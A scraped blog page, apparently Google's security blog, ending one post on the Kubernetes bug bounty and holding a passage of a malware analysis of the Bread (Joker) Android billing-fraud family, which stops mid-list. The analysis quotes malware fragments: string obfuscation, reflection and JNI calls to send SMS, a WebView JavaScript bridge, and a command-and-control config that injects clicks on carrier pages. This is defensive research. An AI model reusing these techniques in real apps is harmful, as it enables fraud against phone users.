href="https://www.google.com/about/appsecurity/reward-program/">the Google VRP</a>.</div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </script> <noscript> <span class="byline-author">Posted by Maya Kaczorowski, Product Manager, Container Security and Aaron Small, Product Manager, GKE On-Prem Security</span><br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://1.bp.blogspot.com/-XGzknm5_BDA/Xh0qmu17ppI/AAAAAAAABc4/73fUXZTkUFc96pfkCXX9inChKA3uLWAoQCNcBGAsYHQ/s1600/kubernetes-bug-bounty-01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="836" data-original-width="1600" height="334" src="https://1.bp.blogspot.com/-XGzknm5_BDA/Xh0qmu17ppI/AAAAAAAABc4/73fUXZTkUFc96pfkCXX9inChKA3uLWAoQCNcBGAsYHQ/s640/kubernetes-bug-bounty-01.jpg" width="640" /></a></div> <br /> At Google, we care deeply about the security of open-source projects, as they’re such a critical part of our infrastructure—and indeed everyone’s. Today, the Cloud-Native Computing Foundation (CNCF) announced a <a href="https://hackerone.com/kubernetes">new bug bounty program for Kubernetes</a> that we helped create and get up and running. Here’s a brief overview of the program, other ways we help secure open-source projects and information on how you can get involved.<br /> <div> <br /></div> <b>Launching the Kubernetes bug bounty program</b><br /> <b><br /></b> <a href="https://kubernetes.io/">Kubernetes</a> is a CNCF project. As part of <a href="https://github.com/cncf/toc/pull/145">its graduation criteria</a>, the CNCF recently funded the project’s first <a href="https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Final%20Report.pdf">security audit</a>, to review its core areas and identify potential issues. The audit identified and addressed several previously unknown security issues. Thankfully, Kubernetes already had a <a href="https://github.com/kubernetes/community/tree/master/committee-product-security">Product Security Committee</a>, including engineers from the <a href="https://cloud.google.com/kubernetes-engine/">Google Kubernetes Engine</a> (GKE) security team, who respond to and patch any newly discovered bugs. But the job of securing an open-source project is never done. To increase awareness of Kubernetes’ security model, attract new security researchers, and reward ongoing efforts in the community, the Kubernetes Product Security Committee began <a href="https://docs.google.com/document/d/1dvlQsOGODhY3blKpjTg6UXzRdPzv5y8V55RD_Pbo7ag/edit#heading=h.7t1efwpev42p">discussions in 2018</a> about launching an official bug bounty program.<br /> <div> <br /></div> <b>Find Kubernetes bugs, get paid</b><br /> <div> <br /></div> <div> What kind of bugs does the bounty program recognize? Most of the content you’d think of as ‘core’ Kubernetes, included at <a href="https://github.com/kubernetes">https://github.com/kubernetes</a>, is in scope. We’re interested in common kinds of security issues like remote code execution, privilege escalation, and bugs in authentication or authorization. Because Kubernetes is a community project, we’re also interested in the Kubernetes supply chain, including build and release processes that might allow a malicious individual to gain unauthorized access to commits, or otherwise affect build artifacts. This is a bit different from your standard bug bounty as there isn’t a ‘live’ environment for you to test—Kubernetes can be configured in many different ways, and we’re looking for bugs that affect any of those (except when existing configuration options could mitigate the bug). Thanks to the CNCF’s ongoing support and funding of this new program, depending on the bug, you can be rewarded with a bounty anywhere from $100 to $10,000.</div> <div> <br /></div> The bug bounty program has been in a private release for several months, with invited researchers submitting bugs and to help us test the triage process. And today, the new Kubernetes bug bounty program is live! We’re excited to see what kind of bugs you discover, and are ready to respond to new reports. You can learn more about the program and how to get involved <a href="https://kubernetes.io/blog/2020/01/14/kubernetes-bug-bounty-announcement/">here</a>.<br /> <div> <br /></div> <b>Dedicated to Kubernetes security</b><br /> <b><br /></b> Google has been involved in this new Kubernetes bug bounty from the get-go: proposing the program, completing vendor evaluations, defining the initial scope, testing the process, and onboarding <a href="https://www.hackerone.com/blog/hackerone-launches-bug-bounty-program-kubernetes">HackerOne</a> to implement the bug bounty solution. Though this is a big effort, it’s part of our ongoing commitment to securing Kubernetes. Google continues to be involved in every part of Kubernetes security, including <a href="https://cloud.google.com/blog/products/containers-kubernetes/exploring-container-security-vulnerability-management-in-open-source-kubernetes">responding to vulnerabilities </a>as part of the Kubernetes Product Security Committee, <a href="https://github.com/kubernetes/community/tree/master/sig-auth">chairing the sig-auth Kubernetes special interest group</a>, and <a href="https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-security-audit-what-gke-and-anthos-users-need-to-know">leading the aforementioned Kubernetes security audit</a>. We realize that security is a critical part of any user’s decision to use an open-source tool, so we dedicate resources to help ensure we’re providing the best possible security for Kubernetes and GKE.<br /> <br /> Although the Kubernetes bug bounty program is new, it isn’t a novel strategy for Google. We have enjoyed a close relationship with the security research community for many years and, in 2010, Google established our own <a href="https://www.google.com/about/appsecurity/reward-program/">Vulnerability Rewards Program</a> (VRP). The VRP provides rewards for vulnerabilities reported in GKE and virtually all other Google Cloud services. (If you find a bug in GKE that isn’t specific to Kubernetes core, you should still report it to the Google VRP!) Nor is Kubernetes the only open-source project with a bug bounty program. In fact, we recently expanded our <a href="https://www.google.com/about/appsecurity/patch-rewards/">Patch Rewards program</a> to provide financial rewards <a href="https://security.googleblog.com/2019/12/announcing-updates-to-our-patch-rewards.html">both upfront and after-the-fact</a> for security improvements to open-source projects.<br /> <div> <br /></div> <div> Help keep the world’s infrastructure safe. <a href="https://hackerone.com/kubernetes">Report a bug to the Kubernetes bug bounty</a>, or a GKE bug to <a href="https://www.google.com/about/appsecurity/reward-program/">the Google VRP</a>.</div> <span itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://plus.google.com/116899029375914044550' itemprop='url'/> </span> </noscript> </div> </div> <div class='share'> <span class='twitter-custom social-wrapper' data-href='http://twitter.com/share?text=Google Online Security Blog:Securing open-source: how Google supports the new Kubernetes bug bounty&url=https://security.googleblog.com/2020/01/securing-open-source-how-google.html&via=google'> <img alt='Share on Twitter' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_twitter_black_24dp.png' width='24'/> </span> <span class='fb-custom social-wrapper' data-href='https://www.facebook.com/sharer.php?u=https://security.googleblog.com/2020/01/securing-open-source-how-google.html'> <img alt='Share on Facebook' height='24' src='https://www.gstatic.com/images/icons/material/system/2x/post_facebook_black_24dp.png' width='24'/> </span> </div> <div class='comment-container'> <i class='comment-img material-icons'>  </i> <span class='cmt_count_iframe_holder' data-count='0' data-onclick='javascript:window.open(this.href, "bloggerPopup", "toolbar=0,location=0,statusbar=1,menubar=0,scrollbars=yes,width=640,height=500"); return false;' data-post-url='https://security.googleblog.com/2020/01/securing-open-source-how-google.html' data-url='https://security.googleblog.com/2020/01/securing-open-source-how-google.html' style='color: #4184F3;'></span> </div> <div class='post-footer'> <div class='cmt_iframe_holder' data-href='https://security.googleblog.com/2020/01/securing-open-source-how-google.html' data-viewtype='FILTERED_POSTMOD'></div> <a href='https://plus.google.com/112374322230920073195' rel='author' style='display:none;'> Google </a> <div class='label-footer'> </div> </div> </div> <div class='post' data-id='7325565675308048202' itemscope='' itemtype='http://schema.org/BlogPosting'> <h2 class='title' itemprop='name'> <a href='https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html' itemprop='url' title='PHA Family Highlights: Bread (and Friends)'> PHA Family Highlights: Bread (and Friends) </a> </h2> <div class='post-header'> <div class='published'> <span class='publishdate' itemprop='datePublished'> January 9, 2020 </span> </div> </div> <div class='post-body'> <div class='post-content' itemprop='articleBody'> <script type='text/template'> <span class="byline-author">Posted by Alec Guertin and Vadim Kotov, Android Security & Privacy Team </span><br /> <div class="separator" style="clear: both; text-align: center;"> <span class="byline-author"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzvCbCxf0H4zVtIrYFVhfDwTt-mVUt7UFChOTmjCXXN89nC9OXZ0l3pnWXQvL8_2cBlhup3ttww7blsCldGo88zTtxavBRXtcDoABD_qrBELwQEvIRthqYHNclB3q2Bqj-2yt8lBV_-Ebo/s1600/phaFamilyHighlights_Bread.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="763" data-original-width="1353" height="361" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzvCbCxf0H4zVtIrYFVhfDwTt-mVUt7UFChOTmjCXXN89nC9OXZ0l3pnWXQvL8_2cBlhup3ttww7blsCldGo88zTtxavBRXtcDoABD_qrBELwQEvIRthqYHNclB3q2Bqj-2yt8lBV_-Ebo/s640/phaFamilyHighlights_Bread.png" width="640" /></a></span></div> <span class="byline-author"> In this edition of our <strong>PHA Family Highlights</strong> series we introduce Bread, a large-scale billing fraud family. We first started tracking Bread (also known as Joker) in early 2017, identifying apps designed solely for <a href="https://developers.google.com/android/play-protect/phacategories#billing-fraud">SMS fraud</a>. As the Play Store has introduced new policies and Google Play Protect has scaled defenses, Bread apps were forced to continually iterate to search for gaps. They have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected. Many of these samples appear to be designed specifically to attempt to slip into the Play Store undetected and are not seen elsewhere. In this post, we show how Google Play Protect has defended against a well organized, persistent attacker and share examples of their techniques. <br /> </span><br /> <h1> <span class="byline-author"> TL;DR</span></h1> <span class="byline-author"> </span> <br /> <ul><span class="byline-author"> <li>Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users </li> <li>Bread apps originally performed SMS fraud, but have largely abandoned this for WAP billing following the introduction of <a href="https://android-developers.googleblog.com/2019/01/reminder-smscall-log-policy-changes.html">new Play policies</a> restricting use of the SEND_SMS permission and increased coverage by Google Play Protect </li> <li>More information on stats and relative impact is available in the <a href="https://www.blog.google/products/android-enterprise/look-back-2018-android-security-privacy-year-review/">Android Security 2018 Year in Review report</a> </li> </span></ul> <span class="byline-author"> </span> <h1> <span class="byline-author"> BILLING FRAUD</span></h1> <span class="byline-author"> Bread apps typically fall into two categories: SMS fraud (older versions) and toll fraud (newer versions). Both of these types of fraud take advantage of mobile billing techniques involving the user’s carrier. <br /> <h2> SMS Billing</h2> Carriers may partner with vendors to allow users to pay for services by SMS. The user simply needs to text a prescribed keyword to a prescribed number (shortcode). A charge is then added to the user’s bill with their mobile service provider. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8SShSiS3Pas9jvZKVSXIYRAD0gdkerJ9c8TTte33dHo1x9uSRBbxsezgMnolYqjWnmgzxdFjMkYljQAaFTDT-ntIk5Gk-w7psc7n-vpKIU46XzDVoUwTjazUn50KDsyFmUaUKzCpNZ5F/s1600/billFraud.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="709" data-original-width="546" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu8SShSiS3Pas9jvZKVSXIYRAD0gdkerJ9c8TTte33dHo1x9uSRBbxsezgMnolYqjWnmgzxdFjMkYljQAaFTDT-ntIk5Gk-w7psc7n-vpKIU46XzDVoUwTjazUn50KDsyFmUaUKzCpNZ5F/s400/billFraud.png" width="308" /></a></div> <h2> Toll Billing</h2> Carriers may also provide payment endpoints over a web page. The user visits the URL to complete the payment and enters their phone number. Verification that the request is coming from the user’s device is completed using two possible methods: <br /> <ol> <li>The user connects to the site over mobile data, not WiFi (so the service provider directly handles the connection and can validate the phone number); or </li> <li>The user must retrieve a code sent to them via SMS and enter it into the web page (thereby proving access to the provided phone number). </li> </ol> <h2> Fraud</h2> Both of the billing methods detailed above provide device verification, but not user verification. The carrier can determine that the request originates from the user’s device, but does not require any interaction from the user that cannot be automated. Malware authors use injected clicks, custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user. <br /> <h1> STRING & DATA OBFUSCATION</h1> Bread apps have used many innovative and classic techniques to hide strings from analysis engines. Here are some highlights. <br /> <h2> Standard Encryption</h2> Frequently, Bread apps take advantage of standard crypto libraries in `java.util.crypto`. We have discovered apps using AES, Blowfish, and DES as well as combinations of these to encrypt their strings. <br /> <h2> Custom Encryption</h2> Other variants have used custom-implemented encryption algorithms. Some common techniques include: basic XOR encryption, nested XOR and custom key-derivation methods. Some variants have gone so far as to use a different key for the strings of each class. <br /> <h2> Split Strings</h2> Encrypted strings can be a signal that the code is trying to hide something. Bread has used a few tricks to keep strings in plaintext while preventing basic string matching. <br /> <pre class="prettyprint">String click_code = new StringBuilder().append(".cli").append("ck();"); </pre> Going one step further, these substrings are sometimes scattered throughout the code, retrieved from static variables and method calls. Various versions may also change the index of the split (e.g. “.clic” and “k();”). <br /> <h2> Delimiters</h2> Another technique to obfuscate unencrypted strings uses repeated delimiters. A short, constant string of characters is inserted at strategic points to break up keywords: <br /> <pre class="prettyprint">String js = "javm6voTascrm6voTipt:window.SDFGHWEGSG.catcm6voThPage(docm6voTument.getElemm6voTentsByTm6voTagName('html')[m6voT0].innerHTML);" </pre> At runtime, the delimiter is removed before using the string: <br /> <pre class="prettyprint">js = js.replaceAll("m6voT", ""); </pre> <h1> API OBFUSCATION</h1> SMS and toll fraud generally requires a few basic behaviors (for example, disabling WiFi or accessing SMS), which are accessible by a handful of APIs. Given that there are a limited number of behaviors required to identify billing fraud, Bread apps have had to try a wide variety of techniques to mask usage of these APIs. <br /> <h2> Reflection</h2> Most methods for hiding API usage tend to use Java reflection in some way. In some samples, Bread has simply directly called the Reflect API on strings decrypted at runtime. <br /> <pre class="prettyprint">Class smsManagerClass = Class.forName(p.a().decrypt("wI7HmhUo0OYTnO2rFy3yxE2DFECD2I9reFnmPF3LuAc=")); // android.telephony.SmsManager smsManagerClass.getMethod(p.a().decrypt("0oXNjC4kzLwqnPK9BiL4qw=="), // sendTextMessage String.class, String.class, String.class, PendingIntent.class, PendingIntent.class).invoke(smsManagerClass.getMethod(p.a().decrypt("xoXXrB8n1b0LjYfIYUObrA==")).invoke(null), addr, null, message, null, null); // getDefault </pre> <h2> JNI</h2> Bread has also tested our ability to analyze native code. In one sample, no SMS-related code appears in the DEX file, but there is a native method registered. <br /> <pre class="prettyprint"> public static native void nativesend(String arg0, String arg1); </pre> Two strings are passed into the call, the shortcode and keyword used for SMS billing (getter methods renamed here for clarity). <br /> <pre class="prettyprint"> JniManager.nativesend(this.get_shortcode(), this.get_keyword()); </pre> In the native library, it stores the strings to access the SMS API. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1lmTDAsIjHhKj4KHVCOHomtgjur13HIpTF1piKz_vrCCG6Suqdn-Hiib750TnBR9OeINPMxPu-9Zd-sUsbGrAzxliR48p94slqnng6hlezwskfxxKuwV1GSUgoaj8vAuB8W8FhAKtlEg/s1600/stringsShadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="224" data-original-width="1048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL1lmTDAsIjHhKj4KHVCOHomtgjur13HIpTF1piKz_vrCCG6Suqdn-Hiib750TnBR9OeINPMxPu-9Zd-sUsbGrAzxliR48p94slqnng6hlezwskfxxKuwV1GSUgoaj8vAuB8W8FhAKtlEg/s1600/stringsShadow.png" /></a></div> The <code>nativesend</code> method uses the Java Native Interface (JNI) to fetch and call the Android SMS API. The following is a screenshot from IDA with comments showing the strings and JNI functions. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQHWcCNXsi_ymUvlfvFBPtimS7DS5Fh_AgcESPoEAKxfIg4QjPawHBOuFEpA98T0mPu_AOPSaBkhTNFweMlnSpVT3Xeu1U8eacj6MPaVlouE3NxZvpO92A0izXwoYkBl_JKTSf0o5L1GMH/s1600/nativesend2Shadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="787" data-original-width="1378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQHWcCNXsi_ymUvlfvFBPtimS7DS5Fh_AgcESPoEAKxfIg4QjPawHBOuFEpA98T0mPu_AOPSaBkhTNFweMlnSpVT3Xeu1U8eacj6MPaVlouE3NxZvpO92A0izXwoYkBl_JKTSf0o5L1GMH/s1600/nativesend2Shadow.png" /></a></div> <h2> WebView JavaScript Interface</h2> Continuing on the theme of cross-language bridges, Bread has also tried out some obfuscation methods utilizing JavaScript in WebViews. The following method is declared in the DEX. <br /> <pre class="prettyprint"> public void method1(String p7, String p8, String p9, String p10, String p11) { Class v0_1 = Class.forName(p7); Class[] v1_1 = new Class[0]; Object[] v3_1 = new Object[0]; Object v1_3 = v0_1.getMethod(p8, v1_1).invoke(0, v3_1); Class[] v2_2 = new Class[5]; v2_2[0] = String.class; v2_2[1] = String.class; v2_2[2] = String.class; v2_2[3] = android.app.PendingIntent.class; v2_2[4] = android.app.PendingIntent.class; reflect.Method v0_2 = v0_1.getMethod(p9, v2_2); Object[] v2_4 = new Object[5]; v2_4[0] = p10; v2_4[1] = 0; v2_4[2] = p11; v2_4[3] = 0; v2_4[4] = 0; v0_2.invoke(v1_3, v2_4); } </pre> Without context, this method does not reveal much about its intended behavior, and there are no calls made to it anywhere in the DEX. However, the app does create a WebView and registers a JavaScript interface to this class. <br /> <pre class="prettyprint">this.webView.addJavascriptInterface(this, "stub"); </pre> This gives JavaScript run in the WebView access to this method. The app loads a URL pointing to a Bread-controlled server. The response contains some basic HTML and JavaScript. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDMRoRbv3jAGCBbaOD-oT9SvtbY7cBAtwFm61tnrqlXhqaS3qVjhzanbkIwArDUskWp7zevd_h-Y3dF-Mr8UM7mz-6Ube6ooK6y4_jNYT2xbT8cbaaxO9aO2QsZVL8sNx1bPr17SZS7x1/s1600/Screenshot+2020-01-09+at+11.48.44+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="552" data-original-width="1164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDMRoRbv3jAGCBbaOD-oT9SvtbY7cBAtwFm61tnrqlXhqaS3qVjhzanbkIwArDUskWp7zevd_h-Y3dF-Mr8UM7mz-6Ube6ooK6y4_jNYT2xbT8cbaaxO9aO2QsZVL8sNx1bPr17SZS7x1/s1600/Screenshot+2020-01-09+at+11.48.44+AM.png" /></a></div> In green, we can see the references to the SMS API. In red, we see those values being passed into the suspicious Java method through the registered interface. Now, using these strings <code>method1</code> can use reflection to call <code>sendTextMessage</code> and process the payment. <br /> <h1> PACKING</h1> In addition to implementing custom obfuscation techniques, apps have used several commercially available packers including: Qihoo360, AliProtect and SecShell. <br /> More recently, we have seen Bread-related apps trying to hide malicious code in a native library shipped with the APK. Earlier this year, we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using <code>DexClassLoader</code>. <br /> The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3jdkV5dxRsrBwvzvRCe9N_4Nzwj2fJ7zjTdh9TXUa4SyUQQmUxRZw3Vk5pYT0Eg78z_Dpav5Hjs0FVEPiAp-XzkQk9fp34xPJi-OAZc7yBnTuWPFrjODYfZyvaSyPQTFt-RIzNKGkyh_2/s1600/ida-screenshotShadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="736" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3jdkV5dxRsrBwvzvRCe9N_4Nzwj2fJ7zjTdh9TXUa4SyUQQmUxRZw3Vk5pYT0Eg78z_Dpav5Hjs0FVEPiAp-XzkQk9fp34xPJi-OAZc7yBnTuWPFrjODYfZyvaSyPQTFt-RIzNKGkyh_2/s1600/ida-screenshotShadow.png" /></a></div> After we blocked those samples, they moved a significant portion of malicious functionality into the native library, which resulted in a rather peculiar back and forth between Dalvik and native code: <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQbFqDOpiG7WQbB9jp0kmzK6jloKbKMI4IszfYI7brxjMLuSblaKi3554RvBIhAxwuBhSBDcHwp2ee2nP946e9Mvf-GBLE1hxdibMqNvxrM5VV4NVCAsIL3at1xrksuUdiqRbiQWYaWiqw/s1600/sqwzJ9G8weGFxDnqqfmrT6Q.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="407" data-original-width="720" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQbFqDOpiG7WQbB9jp0kmzK6jloKbKMI4IszfYI7brxjMLuSblaKi3554RvBIhAxwuBhSBDcHwp2ee2nP946e9Mvf-GBLE1hxdibMqNvxrM5VV4NVCAsIL3at1xrksuUdiqRbiQWYaWiqw/s1600/sqwzJ9G8weGFxDnqqfmrT6Q.png" /></a></div> <h1> COMMAND & CONTROL</h1> <h2> Dynamic Shortcodes & Content</h2> Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details. In the example server response below, the green fields show text to be shown to the user. The red fields are used as the shortcode and keyword for SMS billing. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh07quSRgdd1DGBiU8MIUriPHfdIwSZOxyNqhtRM6TaJXSqsWnxAf3rMfSJD_sf6RR0c8cQ7DErJEgt4HBVvQe86v3Gvmd138PqDMTJdZmpONtirMEjUzsMsnmyZCdByahyphenhyphenSBD_wivxEeAf/s1600/Screenshot+2020-01-09+at+11.51.43+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="318" data-original-width="1160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh07quSRgdd1DGBiU8MIUriPHfdIwSZOxyNqhtRM6TaJXSqsWnxAf3rMfSJD_sf6RR0c8cQ7DErJEgt4HBVvQe86v3Gvmd138PqDMTJdZmpONtirMEjUzsMsnmyZCdByahyphenhyphenSBD_wivxEeAf/s1600/Screenshot+2020-01-09+at+11.51.43+AM.png" /></a></div> <h2> State Machines</h2> Since various carriers implement the billing process differently, Bread has developed several variants containing generalized state machines implementing all possible steps. At runtime, the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server. The configuration contains a list of steps to execute with URLs and JavaScript. <br /> <pre class="prettyprint">{ "message":"Success", "result":[ { "list":[ { "endUrl":"http://sabai5555.com/", "netType":0, "number":1, "offerId":"1009", "step":1, "trankUrl": "http://atracking-auto.appflood.com/transaction/post_click?offer_id=19190660&aff_id=10336" }, { "netType":0, "number":2, "offerId":"1009", "params":"function jsFun(){document.getElementsByTagName('a')[1].click()};", "step":2 }, { "endUrl":"http://consentprt.dtac.co.th/webaoc/InformationPage", "netType":0, "number":3, "offerId":"1009", "params":"javascript:jsFun()", "step":4 }, { "endUrl":"http://consentprt.dtac.co.th/webaoc/SuccessPage", "netType":0, "number":4, "offerId":"1009", "params":"javascript:getOk()", "step":3 }, { "netType":0, "number":5, "offerId":"1009", "step":7 } ], "netType":0, "offerId":"1009" } ], "code":"200" } </pre> The steps implemented include: <br /> <ul> <li>Load a URL in a WebView </li> <li>Run JavaScript in WebView </li> <li>Toggle WiFi state </li> <li>Toggle mobile data state </li> <li>Read/modify SMS inbox </li> <li>Solve captchas </li> </ul> <h3> Captchas</h3> One of the more interesting states implements the ability to solve basic captchas (obscured letters and numbers). First, the app creates a JavaScript function to call a Java method, <code>getImageBase64</code>, exposed to WebView using <code>addJavascriptInterface</code>. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2r-HhAcy8LKR2nyEHC1zMpOaIbzg8c1zewkIKYBxmesTABQ0waihbLTyslgmpO4nxw1m90ASeNXz5vj5qqYoh7EzvlfKBez-k9kpmg2QQT9w_GkJzc4G19SuZJnGqgXICcag69vzTZqEU/s1600/Screenshot+2020-01-09+at+11.52.50+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="306" data-original-width="1142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2r-HhAcy8LKR2nyEHC1zMpOaIbzg8c1zewkIKYBxmesTABQ0waihbLTyslgmpO4nxw1m90ASeNXz5vj5qqYoh7EzvlfKBez-k9kpmg2QQT9w_GkJzc4G19SuZJnGqgXICcag69vzTZqEU/s1600/Screenshot+2020-01-09+at+11.52.50+AM.png" /></a></div> The value used to replace <code>GET_IMG_OBJECT</code> comes from the JSON configuration. <br /> <pre class="prettyprint">"params": "document.getElementById('captcha')" </pre> The app then uses JavaScript injection to create a new script in the carrier’s web page to run the new function. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaNOFVio3o24-WzCn6_D-xPnpZIK33qjG5eW73ryDi3vClospKza2_Rir9Uuclh1WmXrvVEoxkDmxY3fGCsZYaeFZuccon7lWjsZI7hNAbEA5F-u2XjFofVs9lfl5l3LRNZjsSHEmUCosg/s1600/Screenshot+2020-01-09+at+11.53.51+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="245" data-original-width="1158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaNOFVio3o24-WzCn6_D-xPnpZIK33qjG5eW73ryDi3vClospKza2_Rir9Uuclh1WmXrvVEoxkDmxY3fGCsZYaeFZuccon7lWjsZI7hNAbEA5F-u2XjFofVs9lfl5l3LRNZjsSHEmUCosg/s1600/Screenshot+2020-01-09+at+11.53.51+AM.png" /></a></div> The base64-encoded image is then uploaded to an image recognition service. If the text is retrieved successfully, the app uses JavaScript injection again to submit the HTML form with the captcha answer. <br /> <h1> CLOAKING</h1> <h2> Client-side Carrier Checks</h2> In our basic command & control example above, we didn’t address the (incorrectly labeled) “imei” field. <br /> <pre class="prettyprint">{ "button": "ยินดีต้อนรับ", "code": 0, "content": "F10", "imei": "52003,52005,52000", "rule": "Here are all the pictures you need, about happiness, beauty, beauty, etc., with our most sincere service, to provide you with the most complete resources.", "service": "4219245" } </pre> This contains the Mobile Country Code (MCC) and Mobile Network Code (MNC) values that the billing process will work for. In this example, the server response contains several values for Thai carriers. The app checks if the device’s network matches one of those provided by the server. If it does, it will commence with the billing process. If the value does not match, the app skips the “disclosure” page and billing process and brings the user straight to the app content. <br /> In some versions, the server would only return valid responses several days after the apps were submitted. <br /> <h2> Server-side Carrier Checks</h2> In the JavaScript bridge API obfuscation example covered above, the server supplied the app with the necessary strings to complete the billing process. However, analysts may not always see the indicators of compromise in the server’s response. <br /> In this example, the requests to the server take the following form: <br /> <pre class="prettyprint">http://X.X.X.X/web?operator=52000&id=com.battery.fakepackage&deviceid=deadbeefdeadbeefdeadbeefdeadbeef </pre> Here, the “operator” query parameter is the Mobile Country Code and Mobile Network Code . The server can use this information to determine if the user’s carrier is one of Bread’s targets. If not, the response is scrubbed of the strings used to complete the billing fraud. <br /> <pre class="prettyprint"><a onclick="Sub()">ไปเดี๋ยวนี้</a> <div style="display:none"> <p id="deviceid">deadbeefdeadbeefdeadbeefdeadbeef</p> <p id="cmobi"></p> <p id="deni"></p> <p id="ssm"></p> <p id="shortcode"></p> <p id="keyword"></p> </div> </pre> <h1> MISLEADING USERS</h1> Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure, showing <strong>terms and conditions</strong> or a <strong>confirm</strong> button. However, the actual text would often only display a basic welcome message. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGq7h5f05pBnhkJHUork21ShlzEBprudwJepX2HdimmD2nU0mnBLsPEiVZTHcfqAegRvnyd_ulXeiJVEpL6elrL6DQR4J_X4B6x0xvn6sGWql8IA0Vam1gMGj3rRyh9l7RCIE1w6g2QW14/s1600/pastedimage0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="288" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGq7h5f05pBnhkJHUork21ShlzEBprudwJepX2HdimmD2nU0mnBLsPEiVZTHcfqAegRvnyd_ulXeiJVEpL6elrL6DQR4J_X4B6x0xvn6sGWql8IA0Vam1gMGj3rRyh9l7RCIE1w6g2QW14/s400/pastedimage0.png" width="240" /></a></div> <em>Translation: “This app is a place to be and it will feel like a superhero with this new app. We hope you enjoy it!”</em> <br /> Other versions included all the pieces needed for a valid disclosure message. <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizocTMrtfJG1zz64BT3VRWq5SNualxjEc0UhcXYoQHv1_VBG6zWk5z2lVWJey78rO5Jc8CeHVaO7YiwdAl4IjIdp4X7rWO08jV553NsTkjBIdoaBX0YWvjWDVN0NgpTIBzZnYgeeEziYD6/s1600/pastedImage0%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="480" data-original-width="288" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizocTMrtfJG1zz64BT3VRWq5SNualxjEc0UhcXYoQHv1_VBG6zWk5z2lVWJey78rO5Jc8CeHVaO7YiwdAl4IjIdp4X7rWO08jV553NsTkjBIdoaBX0YWvjWDVN0NgpTIBzZnYgeeEziYD6/s400/pastedImage0%25281%2529.png" width="240" /></a></div> When translated the disclosure reads: <br /> <em>“Apply Car Racing Clip \n Please enter your phone number for service details. \n Terms and Conditions \nFrom 9 Baht / day, you will receive 1 message / day. \nPlease stop the V4 printing service at 4739504 \n or call 02-697-9298 \n Monday - Friday at 8.30 - 5.30pm \n”</em> <br /> However, there are still two issues here: <br /> <ol> <li>The numbers to contact for cancelling the subscription are not 